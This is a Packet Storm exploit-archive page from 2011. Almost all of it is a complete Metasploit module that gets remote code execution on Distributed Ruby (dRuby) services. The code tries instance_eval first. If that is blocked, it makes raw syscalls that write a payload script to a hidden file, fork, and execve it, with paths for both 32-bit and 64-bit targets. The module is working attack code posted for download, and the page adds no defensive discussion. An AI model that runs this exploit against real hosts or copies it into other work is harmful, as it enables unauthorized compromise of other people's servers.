ignore security and it'll go away

Distributed Ruby Send instance_eval/syscall Code Execution

Distributed Ruby Send instance_eval/syscall Code Execution
Posted Mar 28, 2011
Authored by joernchen | Site metasploit.com

This Metasploit module exploits remote code execution vulnerabilities in dRuby.

tags | exploit, remote, vulnerability, code execution
MD5 | 1ddfb7438e9601a8ff41f0ece5b3ef06

Distributed Ruby Send instance_eval/syscall Code Execution

Change Mirror Download
##
# $Id: drb_remote_codeexec.rb 12168 2011-03-28 17:30:02Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/framework/
##

require 'msf/core'
require 'drb/drb'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

def initialize(info = {})
super(update_info(info,
'Name' => 'Distributed Ruby Send instance_eval/syscall Code Execution',
'Description' => %q{
This module exploits remote code execution vulnerabilities in dRuby
},
'Author' => [ 'joernchen <joernchen@phenoelit.de> (Phenoelit)' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 12168 $',
'References' =>
[
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
},
'Space' => 32768,
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DefaultTarget' => 0))


register_options(
[
OptString.new('URI', [true, "The dRuby URI of the target host (druby://host:port)", ""]),
], self.class)
end

def exploit
serveruri = datastore['URI']
DRb.start_service
p = DRbObject.new_with_uri(serveruri)
class << p
undef :send
end
begin
print_status('trying to exploit instance_eval')
p.send(:instance_eval,"Kernel.fork { `#{payload.encoded}` }")

rescue SecurityError => e
print_status('instance eval failed, trying to exploit syscall')
filename = "." + Rex::Text.rand_text_alphanumeric(16)
begin

# syscall to decide wether it's 64 or 32 bit:
# it's getpid on 32bit which will succeed, and writev on 64bit
# which will fail due to missing args
j = p.send(:syscall,20)
# syscall open
i = p.send(:syscall,8,filename,0700)
# syscall write
p.send(:syscall,4,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
# syscall close
p.send(:syscall,6,i)
# syscall fork
p.send(:syscall,2)
# syscall execve
p.send(:syscall,11,filename,0,0)

# not vulnerable
rescue SecurityError => e

print_status('target is not vulnerable')

# likely 64bit system
rescue => e
# syscall creat
i = p.send(:syscall,85,filename,0700)
# syscall write
p.send(:syscall,1,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
# syscall close
p.send(:syscall,3,i)
# syscall fork
p.send(:syscall,57)
# syscall execve
p.send(:syscall,59,filename,0,0)
end
end
print_status("payload executed from file #{filename}") unless filename.nil?
print_status("make sure to remove that file") unless filename.nil?
handler(nil)
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    2 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close